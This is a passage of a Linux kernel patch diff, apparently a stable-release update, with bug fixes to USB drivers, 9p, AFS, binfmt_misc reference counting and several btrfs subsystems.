+ 	.delay_rts_after_send = 1,
+ };
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 94bc7786a3c4e..4964fa7419efa 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -506,6 +506,13 @@ static void dwc3_free_event_buffers(struct dwc3 *dwc)
+ static int dwc3_alloc_event_buffers(struct dwc3 *dwc, unsigned int length)
+ {
+ 	struct dwc3_event_buffer *evt;
++	unsigned int hw_mode;
++
++	hw_mode = DWC3_GHWPARAMS0_MODE(dwc->hwparams.hwparams0);
++	if (hw_mode == DWC3_GHWPARAMS0_MODE_HOST) {
++		dwc->ev_buf = NULL;
++		return 0;
++	}
+ 
+ 	evt = dwc3_alloc_one_event_buffer(dwc, length);
+ 	if (IS_ERR(evt)) {
+@@ -527,6 +534,9 @@ int dwc3_event_buffers_setup(struct dwc3 *dwc)
+ {
+ 	struct dwc3_event_buffer	*evt;
+ 
++	if (!dwc->ev_buf)
++		return 0;
++
+ 	evt = dwc->ev_buf;
+ 	evt->lpos = 0;
+ 	dwc3_writel(dwc->regs, DWC3_GEVNTADRLO(0),
+@@ -544,6 +554,9 @@ void dwc3_event_buffers_cleanup(struct dwc3 *dwc)
+ {
+ 	struct dwc3_event_buffer	*evt;
+ 
++	if (!dwc->ev_buf)
++		return;
++
+ 	evt = dwc->ev_buf;
+ 
+ 	evt->lpos = 0;
+diff --git a/drivers/usb/gadget/udc/fsl_udc_core.c b/drivers/usb/gadget/udc/fsl_udc_core.c
+index a67873a074b7b..c1a62ebd78d66 100644
+--- a/drivers/usb/gadget/udc/fsl_udc_core.c
++++ b/drivers/usb/gadget/udc/fsl_udc_core.c
+@@ -2487,7 +2487,7 @@ static int fsl_udc_probe(struct platform_device *pdev)
+ 	/* setup the udc->eps[] for non-control endpoints and link
+ 	 * to gadget.ep_list */
+ 	for (i = 1; i < (int)(udc_controller->max_ep / 2); i++) {
+-		char name[14];
++		char name[16];
+ 
+ 		sprintf(name, "ep%dout", i);
+ 		struct_ep_setup(udc_controller, i * 2, name, 1);
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 505f45429c125..ec2f6bedf003a 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -2971,7 +2971,7 @@ static int xhci_configure_endpoint(struct xhci_hcd *xhci,
+ 				xhci->num_active_eps);
+ 		return -ENOMEM;
+ 	}
+-	if ((xhci->quirks & XHCI_SW_BW_CHECKING) &&
++	if ((xhci->quirks & XHCI_SW_BW_CHECKING) && !ctx_change &&
+ 	    xhci_reserve_bandwidth(xhci, virt_dev, command->in_ctx)) {
+ 		if ((xhci->quirks & XHCI_EP_LIMIT_QUIRK))
+ 			xhci_free_host_resources(xhci, ctrl_ctx);
+@@ -4313,8 +4313,10 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev,
+ 		mutex_unlock(&xhci->mutex);
+ 		ret = xhci_disable_slot(xhci, udev->slot_id);
+ 		xhci_free_virt_device(xhci, udev->slot_id);
+-		if (!ret)
+-			xhci_alloc_dev(hcd, udev);
++		if (!ret) {
++			if (xhci_alloc_dev(hcd, udev) == 1)
++				xhci_setup_addressable_virt_dev(xhci, udev);
++		}
+ 		kfree(command->completion);
+ 		kfree(command);
+ 		return -EPROTO;
+diff --git a/drivers/video/fbdev/offb.c b/drivers/video/fbdev/offb.c
+index 91001990e351c..6f0a9851b0924 100644
+--- a/drivers/video/fbdev/offb.c
++++ b/drivers/video/fbdev/offb.c
+@@ -355,7 +355,7 @@ static void offb_init_palette_hacks(struct fb_info *info, struct device_node *dp
+ 			par->cmap_type = cmap_gxt2000;
+ 	} else if (of_node_name_prefix(dp, "vga,Display-")) {
+ 		/* Look for AVIVO initialized by SLOF */
+-		struct device_node *pciparent = of_get_parent(dp);
++		struct device_node *pciparent __free(device_node) = of_get_parent(dp);
+ 		const u32 *vid, *did;
+ 		vid = of_get_property(pciparent, "vendor-id", NULL);
+ 		did = of_get_property(pciparent, "device-id", NULL);
+@@ -367,7 +367,6 @@ static void offb_init_palette_hacks(struct fb_info *info, struct device_node *dp
+ 			if (par->cmap_adr)
+ 				par->cmap_type = cmap_avivo;
+ 		}
+-		of_node_put(pciparent);
+ 	} else if (dp && of_device_is_compatible(dp, "qemu,std-vga")) {
+ #ifdef __BIG_ENDIAN
+ 		const __be32 io_of_addr[3] = { 0x01000000, 0x0, 0x0 };
+diff --git a/fs/9p/xattr.c b/fs/9p/xattr.c
+index 3b9aa61de8c2d..2aac0e8c4835e 100644
+--- a/fs/9p/xattr.c
++++ b/fs/9p/xattr.c
+@@ -34,10 +34,12 @@ ssize_t v9fs_fid_xattr_get(struct p9_fid *fid, const char *name,
+ 		return retval;
+ 	}
+ 	if (attr_size > buffer_size) {
+-		if (!buffer_size) /* request to get the attr_size */
+-			retval = attr_size;
+-		else
++		if (buffer_size)
+ 			retval = -ERANGE;
++		else if (attr_size > SSIZE_MAX)
++			retval = -EOVERFLOW;
++		else /* request to get the attr_size */
++			retval = attr_size;
+ 	} else {
+ 		iov_iter_truncate(&to, attr_size);
+ 		retval = p9_client_read(attr_fid, 0, &to, &err);
+diff --git a/fs/afs/file.c b/fs/afs/file.c
+index 2eeab57df133a..9051ed0085544 100644
+--- a/fs/afs/file.c
++++ b/fs/afs/file.c
+@@ -525,13 +525,17 @@ static void afs_add_open_mmap(struct afs_vnode *vnode)
+ 
+ static void afs_drop_open_mmap(struct afs_vnode *vnode)
+ {
+-	if (!atomic_dec_and_test(&vnode->cb_nr_mmap))
++	if (atomic_add_unless(&vnode->cb_nr_mmap, -1, 1))
+ 		return;
+ 
+ 	down_write(&vnode->volume->cell->fs_open_mmaps_lock);
+ 
+-	if (atomic_read(&vnode->cb_nr_mmap) == 0)
++	read_seqlock_excl(&vnode->cb_lock);
++	// the only place where ->cb_nr_mmap may hit 0
++	// see __afs_break_callback() for the other side...
++	if (atomic_dec_and_test(&vnode->cb_nr_mmap))
+ 		list_del_init(&vnode->cb_mmap_link);
++	read_sequnlock_excl(&vnode->cb_lock);
+ 
+ 	up_write(&vnode->volume->cell->fs_open_mmaps_lock);
+ 	flush_work(&vnode->cb_work);
+diff --git a/fs/binfmt_elf_fdpic.c b/fs/binfmt_elf_fdpic.c
+index 2aecd4ffb13b3..c71a409273150 100644
+--- a/fs/binfmt_elf_fdpic.c
++++ b/fs/binfmt_elf_fdpic.c
+@@ -320,7 +320,7 @@ static int load_elf_fdpic_binary(struct linux_binprm *bprm)
+ 	else
+ 		executable_stack = EXSTACK_DEFAULT;
+ 
+-	if (stack_size == 0) {
++	if (stack_size == 0 && interp_params.flags & ELF_FDPIC_FLAG_PRESENT) {
+ 		stack_size = interp_params.stack_size;
+ 		if (interp_params.flags & ELF_FDPIC_FLAG_EXEC_STACK)
+ 			executable_stack = EXSTACK_ENABLE_X;
+diff --git a/fs/binfmt_misc.c b/fs/binfmt_misc.c
+index bb202ad369d53..740dac1012ae8 100644
+--- a/fs/binfmt_misc.c
++++ b/fs/binfmt_misc.c
+@@ -60,12 +60,11 @@ typedef struct {
+ 	char *name;
+ 	struct dentry *dentry;
+ 	struct file *interp_file;
++	refcount_t users;		/* sync removal with load_misc_binary() */
+ } Node;
+ 
+ static DEFINE_RWLOCK(entries_lock);
+ static struct file_system_type bm_fs_type;
+-static struct vfsmount *bm_mnt;
+-static int entry_count;
+ 
+ /*
+  * Max length of the register string.  Determined by:
+@@ -82,19 +81,23 @@ static int entry_count;
+  */
+ #define MAX_REGISTER_LENGTH 1920
+ 
+-/*
+- * Check if we support the binfmt
+- * if we do, return the node, else NULL
+- * locking is done in load_misc_binary
++/**
++ * search_binfmt_handler - search for a binary handler for @bprm
++ * @misc: handle to binfmt_misc instance
++ * @bprm: binary for which we are looking for a handler
++ *
++ * Search for a binary type handler for @bprm in the list of registered binary
++ * type handlers.
++ *
++ * Return: binary type list entry on success, NULL on failure
+  */
+-static Node *check_file(struct linux_binprm *bprm)
++static Node *search_binfmt_handler(struct linux_binprm *bprm)
+ {
+ 	char *p = strrchr(bprm->interp, '.');
+-	struct list_head *l;
++	Node *e;
+ 
+ 	/* Walk all the registered handlers. */
+-	list_for_each(l, &entries) {
+-		Node *e = list_entry(l, Node, list);
++	list_for_each_entry(e, &entries, list) {
+ 		char *s;
+ 		int j;
+ 
+@@ -123,9 +126,49 @@ static Node *check_file(struct linux_binprm *bprm)
+ 		if (j == e->size)
+ 			return e;
+ 	}
++
+ 	return NULL;
+ }
+ 
++/**
++ * get_binfmt_handler - try to find a binary type handler
++ * @misc: handle to binfmt_misc instance
++ * @bprm: binary for which we are looking for a handler
++ *
++ * Try to find a binfmt handler for the binary type. If one is found take a
++ * reference to protect against removal via bm_{entry,status}_write().
++ *
++ * Return: binary type list entry on success, NULL on failure
++ */
++static Node *get_binfmt_handler(struct linux_binprm *bprm)
++{
++	Node *e;
++
++	read_lock(&entries_lock);
++	e = search_binfmt_handler(bprm);
++	if (e)
++		refcount_inc(&e->users);
++	read_unlock(&entries_lock);
++	return e;
++}
++
++/**
++ * put_binfmt_handler - put binary handler node
++ * @e: node to put
++ *
++ * Free node syncing with load_misc_binary() and defer final free to
++ * load_misc_binary() in case it is using the binary type handler we were
++ * requested to remove.
++ */
++static void put_binfmt_handler(Node *e)
++{
++	if (refcount_dec_and_test(&e->users)) {
++		if (e->flags & MISC_FMT_OPEN_FILE)
++			filp_close(e->interp_file, NULL);
++		kfree(e);
++	}
++}
++
+ /*
+  * the loader itself
+  */
+@@ -139,12 +182,7 @@ static int load_misc_binary(struct linux_binprm *bprm)
+ 	if (!enabled)
+ 		return retval;
+ 
+-	/* to keep locking time low, we copy the interpreter string */
+-	read_lock(&entries_lock);
+-	fmt = check_file(bprm);
+-	if (fmt)
+-		dget(fmt->dentry);
+-	read_unlock(&entries_lock);
++	fmt = get_binfmt_handler(bprm);
+ 	if (!fmt)
+ 		return retval;
+ 
+@@ -198,7 +236,16 @@ static int load_misc_binary(struct linux_binprm *bprm)
+ 
+ 	retval = 0;
+ ret:
+-	dput(fmt->dentry);
++
++	/*
++	 * If we actually put the node here all concurrent calls to
++	 * load_misc_binary() will have finished. We also know
++	 * that for the refcount to be zero ->evict_inode() must have removed
++	 * the node to be deleted from the list. All that is left for us is to
++	 * close and free.
++	 */
++	put_binfmt_handler(fmt);
++
+ 	return retval;
+ }
+ 
+@@ -553,30 +600,90 @@ static struct inode *bm_get_inode(struct super_block *sb, int mode)
+ 	return inode;
+ }
+ 
++/**
++ * bm_evict_inode - cleanup data associated with @inode
++ * @inode: inode to which the data is attached
++ *
++ * Cleanup the binary type handler data associated with @inode if a binary type
++ * entry is removed or the filesystem is unmounted and the super block is
++ * shutdown.
++ *
++ * If the ->evict call was not caused by a super block shutdown but by a write
++ * to remove the entry or all entries via bm_{entry,status}_write() the entry
++ * will have already been removed from the list. We keep the list_empty() check
++ * to make that explicit.
++*/
+ static void bm_evict_inode(struct inode *inode)
+ {
+ 	Node *e = inode->i_private;
+ 
+-	if (e && e->flags & MISC_FMT_OPEN_FILE)
+-		filp_close(e->interp_file, NULL);
+-
+ 	clear_inode(inode);
+-	kfree(e);
++
++	if (e) {
++		write_lock(&entries_lock);
++		if (!list_empty(&e->list))
++			list_del_init(&e->list);
++		write_unlock(&entries_lock);
++		put_binfmt_handler(e);
++	}
+ }
+ 
+-static void kill_node(Node *e)
++/**
++ * unlink_binfmt_dentry - remove the dentry for the binary type handler
++ * @dentry: dentry associated with the binary type handler
++ *
++ * Do the actual filesystem work to remove a dentry for a registered binary
++ * type handler. Since binfmt_misc only allows simple files to be created
++ * directly under the root dentry of the filesystem we ensure that we are
++ * indeed passed a dentry directly beneath the root dentry, that the inode
++ * associated with the root dentry is locked, and that it is a regular file we
++ * are asked to remove.
++ */
++static void unlink_binfmt_dentry(struct dentry *dentry)
+ {
+-	struct dentry *dentry;
++	struct dentry *parent = dentry->d_parent;
++	struct inode *inode, *parent_inode;
++
++	/* All entries are immediate descendants of the root dentry. */
++	if (WARN_ON_ONCE(dentry->d_sb->s_root != parent))
++		return;
+ 
++	/* We only expect to be called on regular files. */
++	inode = d_inode(dentry);
++	if (WARN_ON_ONCE(!S_ISREG(inode->i_mode)))
++		return;
++
++	/* The parent inode must be locked. */
++	parent_inode = d_inode(parent);
++	if (WARN_ON_ONCE(!inode_is_locked(parent_inode)))
++		return;
++
++	if (simple_positive(dentry)) {
++		dget(dentry);
++		simple_unlink(parent_inode, dentry);
++		d_delete(dentry);
++		dput(dentry);
++	}
++}
++
++/**
++ * remove_binfmt_handler - remove a binary type handler
++ * @misc: handle to binfmt_misc instance
++ * @e: binary type handler to remove
++ *
++ * Remove a binary type handler from the list of binary type handlers and
++ * remove its associated dentry. This is called from
++ * binfmt_{entry,status}_write(). In the future, we might want to think about
++ * adding a proper ->unlink() method to binfmt_misc instead of forcing caller's
++ * to use writes to files in order to delete binary type handlers. But it has
++ * worked for so long that it's not a pressing issue.
++ */
++static void remove_binfmt_handler(Node *e)
++{
+ 	write_lock(&entries_lock);
+ 	list_del_init(&e->list);
+ 	write_unlock(&entries_lock);
+-
+-	dentry = e->dentry;
+-	drop_nlink(d_inode(dentry));
+-	d_drop(dentry);
+-	dput(dentry);
+-	simple_release_fs(&bm_mnt, &entry_count);
++	unlink_binfmt_dentry(e->dentry);
+ }
+ 
+ /* /<entry> */
+@@ -603,8 +710,8 @@ bm_entry_read(struct file *file, char __user *buf, size_t nbytes, loff_t *ppos)
+ static ssize_t bm_entry_write(struct file *file, const char __user *buffer,
+ 				size_t count, loff_t *ppos)
+ {
+-	struct dentry *root;
+-	Node *e = file_inode(file)->i_private;
++	struct inode *inode = file_inode(file);
++	Node *e = inode->i_private;
+ 	int res = parse_command(buffer, count);
+ 
+ 	switch (res) {
+@@ -618,13 +725,22 @@ static ssize_t bm_entry_write(struct file *file, const char __user *buffer,
+ 		break;
+ 	case 3:
+ 		/* Delete this handler. */
+-		root = file_inode(file)->i_sb->s_root;
+-		inode_lock(d_inode(root));
++		inode = d_inode(inode->i_sb->s_root);
++		inode_lock(inode);
+ 
++		/*
++		 * In order to add new element or remove elements from the list
++		 * via bm_{entry,register,status}_write() inode_lock() on the
++		 * root inode must be held.
++		 * The lock is exclusive ensuring that the list can't be
++		 * modified. Only load_misc_binary() can access but does so
++		 * read-only. So we only need to take the write lock when we
++		 * actually remove the entry from the list.
++		 */
+ 		if (!list_empty(&e->list))
+-			kill_node(e);
++			remove_binfmt_handler(e);
+ 
+-		inode_unlock(d_inode(root));
++		inode_unlock(inode);
+ 		break;
+ 	default:
+ 		return res;
+@@ -683,13 +799,7 @@ static ssize_t bm_register_write(struct file *file, const char __user *buffer,
+ 	if (!inode)
+ 		goto out2;
+ 
+-	err = simple_pin_fs(&bm_fs_type, &bm_mnt, &entry_count);
+-	if (err) {
+-		iput(inode);
+-		inode = NULL;
+-		goto out2;
+-	}
+-
++	refcount_set(&e->users, 1);
+ 	e->dentry = dget(dentry);
+ 	inode->i_private = e;
+ 	inode->i_fop = &bm_entry_operations;
+@@ -733,7 +843,8 @@ static ssize_t bm_status_write(struct file *file, const char __user *buffer,
+ 		size_t count, loff_t *ppos)
+ {
+ 	int res = parse_command(buffer, count);
+-	struct dentry *root;
++	Node *e, *next;
++	struct inode *inode;
+ 
+ 	switch (res) {
+ 	case 1:
+@@ -746,13 +857,22 @@ static ssize_t bm_status_write(struct file *file, const char __user *buffer,
+ 		break;
+ 	case 3:
+ 		/* Delete all handlers. */
+-		root = file_inode(file)->i_sb->s_root;
+-		inode_lock(d_inode(root));
++		inode = d_inode(file_inode(file)->i_sb->s_root);
++		inode_lock(inode);
+ 
+-		while (!list_empty(&entries))
+-			kill_node(list_first_entry(&entries, Node, list));
++		/*
++		 * In order to add new element or remove elements from the list
++		 * via bm_{entry,register,status}_write() inode_lock() on the
++		 * root inode must be held.
++		 * The lock is exclusive ensuring that the list can't be
++		 * modified. Only load_misc_binary() can access but does so
++		 * read-only. So we only need to take the write lock when we
++		 * actually remove the entry from the list.
++		 */
++		list_for_each_entry_safe(e, next, &entries, list)
++			remove_binfmt_handler(e);
+ 
+-		inode_unlock(d_inode(root));
++		inode_unlock(inode);
+ 		break;
+ 	default:
+ 		return res;
+diff --git a/fs/btrfs/delayed-inode.c b/fs/btrfs/delayed-inode.c
+index 1494ce990d298..052112d0daa74 100644
+--- a/fs/btrfs/delayed-inode.c
++++ b/fs/btrfs/delayed-inode.c
+@@ -420,8 +420,6 @@ static void __btrfs_remove_delayed_item(struct btrfs_delayed_item *delayed_item)
+ 
+ 	delayed_root = delayed_node->root->fs_info->delayed_root;
+ 
+-	BUG_ON(!delayed_root);
+-
+ 	if (delayed_item->type == BTRFS_DELAYED_INSERTION_ITEM)
+ 		root = &delayed_node->ins_root;
+ 	else
+@@ -970,7 +968,7 @@ static void btrfs_release_delayed_inode(struct btrfs_delayed_node *delayed_node)
+ 
+ 	if (delayed_node &&
+ 	    test_bit(BTRFS_DELAYED_NODE_INODE_DIRTY, &delayed_node->flags)) {
+-		BUG_ON(!delayed_node->root);
++		ASSERT(delayed_node->root);
+ 		clear_bit(BTRFS_DELAYED_NODE_INODE_DIRTY, &delayed_node->flags);
+ 		delayed_node->count--;
+ 
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index c17232659942d..9ebb7bb37a22e 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -3130,6 +3130,7 @@ static int init_mount_fs_info(struct btrfs_fs_info *fs_info, struct super_block
+ 	int ret;
+ 
+ 	fs_info->sb = sb;
++	/* Temporary fixed values for block size until we read the superblock. */
+ 	sb->s_blocksize = BTRFS_BDEV_BLOCKSIZE;
+ 	sb->s_blocksize_bits = blksize_bits(BTRFS_BDEV_BLOCKSIZE);
+ 
+@@ -3628,6 +3629,7 @@ int __cold open_ctree(struct super_block *sb, struct btrfs_fs_devices *fs_device
+ 	sb->s_bdi->ra_pages *= btrfs_super_num_devices(disk_super);
+ 	sb->s_bdi->ra_pages = max(sb->s_bdi->ra_pages, SZ_4M / PAGE_SIZE);
+ 
++	/* Update the values for the current filesystem. */
+ 	sb->s_blocksize = sectorsize;
+ 	sb->s_blocksize_bits = blksize_bits(sectorsize);
+ 	memcpy(&sb->s_uuid, fs_info->fs_devices->fsid, BTRFS_FSID_SIZE);
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index 5f923c9b773e0..72227c0b4b5a1 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -1748,7 +1748,7 @@ static int btrfs_do_readpage(struct page *page, struct extent_map **em_cached,
+ 	int ret = 0;
+ 	size_t pg_offset = 0;
+ 	size_t iosize;
+-	size_t blocksize = inode->i_sb->s_blocksize;
++	size_t blocksize = fs_info->sectorsize;
+ 	struct extent_io_tree *tree = &BTRFS_I(inode)->io_tree;
+ 
+ 	ret = set_page_extent_mapped(page);
+@@ -3348,7 +3348,7 @@ int extent_invalidate_folio(struct extent_io_tree *tree,
+ 	struct extent_state *cached_state = NULL;
+ 	u64 start = folio_pos(folio);
+ 	u64 end = start + folio_size(folio) - 1;
+-	size_t blocksize = folio->mapping->host->i_sb->s_blocksize;
++	size_t blocksize = btrfs_sb(folio->mapping->host->i_sb)->sectorsize;
+ 
+ 	/* This function is only called for the btree inode */
+ 	ASSERT(tree->owner == IO_TREE_BTREE_INODE_IO);
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 21d262da386d5..75ad735322c4a 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -1894,9 +1894,9 @@ static inline void bitmap_clear_bits(struct btrfs_free_space_ctl *ctl,
+ 		ctl->free_space -= bytes;
+ }
+ 
+-static void bitmap_set_bits(struct btrfs_free_space_ctl *ctl,
+-			    struct btrfs_free_space *info, u64 offset,
+-			    u64 bytes)
++static void btrfs_bitmap_set_bits(struct btrfs_free_space_ctl *ctl,
++				  struct btrfs_free_space *info, u64 offset,
++				  u64 bytes)
+ {
+ 	unsigned long start, count, end;
+ 	int extent_delta = 1;
+@@ -2232,7 +2232,7 @@ static u64 add_bytes_to_bitmap(struct btrfs_free_space_ctl *ctl,
+ 
+ 	bytes_to_set = min(end - offset, bytes);
+ 
+-	bitmap_set_bits(ctl, info, offset, bytes_to_set);
++	btrfs_bitmap_set_bits(ctl, info, offset, bytes_to_set);
+ 
+ 	return bytes_to_set;
+ 
+@@ -2677,15 +2677,16 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	u64 offset = bytenr - block_group->start;
+ 	u64 to_free, to_unusable;
+ 	int bg_reclaim_threshold = 0;
+-	bool initial = ((size == block_group->length) && (block_group->alloc_offset == 0));
++	bool initial;
+ 	u64 reclaimable_unusable;
+ 
+-	WARN_ON(!initial && offset + size > block_group->zone_capacity);
++	spin_lock(&block_group->lock);
+ 
++	initial = ((size == block_group->length) && (block_group->alloc_offset == 0));
++	WARN_ON(!initial && offset + size > block_group->zone_capacity);
+ 	if (!initial)
+ 		bg_reclaim_threshold = READ_ONCE(sinfo->bg_reclaim_threshold);
+ 
+-	spin_lock(&ctl->tree_lock);
+ 	if (!used)
+ 		to_free = size;
+ 	else if (initial)
+@@ -2698,7 +2699,9 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		to_free = offset + size - block_group->alloc_offset;
+ 	to_unusable = size - to_free;
+ 
++	spin_lock(&ctl->tree_lock);
+ 	ctl->free_space += to_free;
++	spin_unlock(&ctl->tree_lock);
+ 	/*
+ 	 * If the block group is read-only, we should account freed space into
+ 	 * bytes_readonly.
+@@ -2707,11 +2710,8 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		block_group->zone_unusable += to_unusable;
+ 		WARN_ON(block_group->zone_unusable > block_group->length);
+ 	}
+-	spin_unlock(&ctl->tree_lock);
+ 	if (!used) {
+-		spin_lock(&block_group->lock);
+ 		block_group->alloc_offset -= size;
+-		spin_unlock(&block_group->lock);
+ 	}
+ 
+ 	reclaimable_unusable = block_group->zone_unusable -
+@@ -2726,6 +2726,8 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		btrfs_mark_bg_to_reclaim(block_group);
+ 	}
+ 
++	spin_unlock(&block_group->lock);
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 10ded9c2be03b..934e360d1aefa 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -4614,7 +4614,14 @@ static noinline int may_destroy_subvol(struct btrfs_root *root)
+ 	ret = btrfs_search_slot(NULL, fs_info->tree_root, &key, path, 0, 0);
+ 	if (ret < 0)
+ 		goto out;
+-	BUG_ON(ret == 0);
++	if (ret == 0) {
++		/*
++		 * Key with offset -1 found, there would have to exist a root
++		 * with such id, but this is out of valid range.
++		 */
++		ret = -EUCLEAN;
++		goto out;
++	}
+ 
+ 	ret = 0;
+ 	if (path->slots[0] > 0) {
+@@ -9104,7 +9111,7 @@ static int btrfs_getattr(struct user_namespace *mnt_userns,
+ 	u64 delalloc_bytes;
+ 	u64 inode_bytes;
+ 	struct inode *inode = d_inode(path->dentry);
+-	u32 blocksize = inode->i_sb->s_blocksize;
++	u32 blocksize = btrfs_sb(inode->i_sb)->sectorsize;
+ 	u32 bi_flags = BTRFS_I(inode)->flags;
+ 	u32 bi_ro_flags = BTRFS_I(inode)->ro_flags;
+ 
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 64b37afb7c87f..31f7fe31b607a 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -517,7 +517,7 @@ static noinline int btrfs_ioctl_fitrim(struct btrfs_fs_info *fs_info,
+ 	 * block group is in the logical address space, which can be any
+ 	 * sectorsize aligned bytenr in  the range [0, U64_MAX].
+ 	 */
+-	if (range.len < fs_info->sb->s_blocksize)
++	if (range.len < fs_info->sectorsize)
+ 		return -EINVAL;
+ 
+ 	range.minlen = max(range.minlen, minlen);
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index e482889667ec9..f3b066b442807 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -2697,8 +2697,6 @@ int btrfs_qgroup_account_extent(struct btrfs_trans_handle *trans, u64 bytenr,
+ 	if (nr_old_roots == 0 && nr_new_roots == 0)
+ 		goto out_free;
+ 
+-	BUG_ON(!fs_info->quota_root);
+-
+ 	trace_btrfs_qgroup_account_extent(fs_info, trans->transid, bytenr,
+ 					num_bytes, nr_old_roots, nr_new_roots);
+ 
+diff --git a/fs/btrfs/reflink.c b/fs/btrfs/reflink.c
+index f50586ff85c84..fc6e428525781 100644
+--- a/fs/btrfs/reflink.c
++++ b/fs/btrfs/reflink.c
+@@ -659,7 +659,7 @@ static int btrfs_extent_same_range(struct inode *src, u64 loff, u64 len,
+ 				   struct inode *dst, u64 dst_loff)
+ {
+ 	struct btrfs_fs_info *fs_info = BTRFS_I(src)->root->fs_info;
+-	const u64 bs = fs_info->sb->s_blocksize;
++	const u64 bs = fs_info->sectorsize;
+ 	int ret;
+ 
+ 	/*
+@@ -726,7 +726,7 @@ static noinline int btrfs_clone_files(struct file *file, struct file *file_src,
+ 	int ret;
+ 	int wb_ret;
+ 	u64 len = olen;
+-	u64 bs = fs_info->sb->s_blocksize;
++	u64 bs = fs_info->sectorsize;
+ 
+ 	/*
+ 	 * VFS's generic_remap_file_range_prep() protects us from cloning the
+@@ -792,7 +792,7 @@ static int btrfs_remap_file_range_prep(struct file *file_in, loff_t pos_in,
+ {
+ 	struct inode *inode_in = file_inode(file_in);
+ 	struct inode *inode_out = file_inode(file_out);
+-	u64 bs = BTRFS_I(inode_out)->root->fs_info->sb->s_blocksize;
++	u64 bs = BTRFS_I(inode_out)->root->fs_info->sectorsize;
+ 	u64 wb_len;
+ 	int ret;
+ 
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index ec3db315f5618..030edc1a9591b 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -720,7 +720,12 @@ static int begin_cmd(struct send_ctx *sctx, int cmd)
+ 	if (WARN_ON(!sctx->send_buf))
+ 		return -EINVAL;
+ 
+-	BUG_ON(sctx->send_size);
++	if (unlikely(sctx->send_size != 0)) {
++		btrfs_err(sctx->send_root->fs_info,
++			  "send: command header buffer not empty cmd %d offset %llu",
++			  cmd, sctx->send_off);
++		return -EINVAL;
++	}
+ 
+ 	sctx->send_size += sizeof(*hdr);
+ 	hdr = (struct btrfs_cmd_header *)sctx->send_buf;
+@@ -5905,26 +5910,52 @@ static int send_write_or_clone(struct send_ctx *sctx,
+ 	int ret = 0;
+ 	u64 offset = key->offset;
+ 	u64 end;
+-	u64 bs = sctx->send_root->fs_info->sb->s_blocksize;
++	u64 bs = sctx->send_root->fs_info->sectorsize;
++	struct btrfs_file_extent_item *ei;
++	u64 disk_byte;
++	u64 data_offset;
++	u64 num_bytes;
++	struct btrfs_inode_info info = { 0 };
+ 
+ 	end = min_t(u64, btrfs_file_extent_end(path), sctx->cur_inode_size);
+ 	if (offset >= end)
+ 		return 0;
+ 
+-	if (clone_root && IS_ALIGNED(end, bs)) {
+-		struct btrfs_file_extent_item *ei;
+-		u64 disk_byte;
+-		u64 data_offset;
++	num_bytes = end - offset;
+ 
+-		ei = btrfs_item_ptr(path->nodes[0], path->slots[0],
+-				    struct btrfs_file_extent_item);
+-		disk_byte = btrfs_file_extent_disk_bytenr(path->nodes[0], ei);
+-		data_offset = btrfs_file_extent_offset(path->nodes[0], ei);
+-		ret = clone_range(sctx, path, clone_root, disk_byte,
+-				  data_offset, offset, end - offset);
+-	} else {
+-		ret = send_extent_data(sctx, path, offset, end - offset);
+-	}
++	if (!clone_root)
++		goto write_data;
++
++	if (IS_ALIGNED(end, bs))
++		goto clone_data;
++
++	/*
++	 * If the extent end is not aligned, we can clone if the extent ends at
++	 * the i_size of the inode and the clone range ends at the i_size of the
++	 * source inode, otherwise the clone operation fails with -EINVAL.
++	 */
++	if (end != sctx->cur_inode_size)
++		goto write_data;
++
++	ret = get_inode_info(clone_root->root, clone_root->ino, &info);
++	if (ret < 0)
++		return ret;
++
++	if (clone_root->offset + num_bytes == info.size)
++		goto clone_data;
++
++write_data:
++	ret = send_extent_data(sctx, path, offset, num_bytes);
++	sctx->cur_inode_next_write_offset = end;
++	return ret;
++
++clone_data:
++	ei = btrfs_item_ptr(path->nodes[0], path->slots[0],
++			    struct btrfs_file_extent_item);
++	disk_byte = btrfs_file_extent_disk_bytenr(path->nodes[0], ei);
++	data_offset = btrfs_file_extent_offset(path->nodes[0], ei);
++	ret = clone_range(sctx, path, clone_root, disk_byte, data_offset, offset,
++			  num_bytes);
+ 	sctx->cur_inode_next_write_offset = end;
+ 	return ret;
+ }
+@@ -7180,8 +7211,8 @@ static int tree_move_down(struct btrfs_path *path, int *level, u64 reada_min_gen
+ 	u64 reada_done = 0;
+ 
+ 	lockdep_assert_held_read(&parent->fs_info->commit_root_sem);
++	ASSERT(*level != 0);
+ 
+-	BUG_ON(*level == 0);
+ 	eb = btrfs_read_node_slot(parent, slot);
+ 	if (IS_ERR(eb))
+ 		return PTR_ERR(eb);
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 6fc5fa18d1ee6..d063379a031dc 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
